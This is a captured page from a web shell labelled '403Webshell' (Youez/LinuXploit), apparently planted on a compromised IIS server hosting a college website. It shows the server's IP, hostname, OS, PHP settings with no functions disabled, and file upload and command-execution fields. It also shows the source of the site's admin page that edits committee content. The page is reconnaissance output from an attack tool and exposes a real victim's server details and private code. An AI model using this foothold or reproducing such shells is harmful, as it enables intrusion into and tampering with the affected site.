403Webshell
Server IP : 50.63.8.194  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT P3NWVPWEB026 10.0 build 17763 (Windows Server 2016) AMD64
User : IWPD_7824(SpiPanel) ( 0)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/admin//iqacell.php

	<?php include 'headerck.php';?>

	<div class="page-header page-header-light">
		<div class="breadcrumb-line breadcrumb-line-light header-elements-md-inline">
			<div class="d-flex">
				<div class="breadcrumb">
					<a href="#" class="breadcrumb-item"><i class="icon-stack"></i>Mange Committees Cells </a>
					<span class="breadcrumb-item active">Committees Cells</span>
				</div>
				<a href="#" class="header-elements-toggle text-default d-md-none"><i class="icon-more"></i></a>
			</div>
		</div>
	</div>
	<!-- /page header -->
	
    <?php
            include("connection.php");
            $sql="select * from commitee_cell where flag='iqac'";
            
            $query_run=mysqli_query($dbCon, $sql);
            $result=mysqli_num_rows($query_run);
            if($result>0)
            {
                while($row=mysqli_fetch_array($query_run))
                {?>
                    <form action="all.php" method="POST">
                    <textarea name="editor" id="editor" cols="30" rows="10">
                    
                    <?php echo $row['p_msg'] ?>
                    </textarea><br>
                        <input type="submit" name="iqac_update" value="Update Content" class="btn-success">
                    </form>
                <?php
                }
            }
			
        //}
    ?>
	

	<?php include 'footerck.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit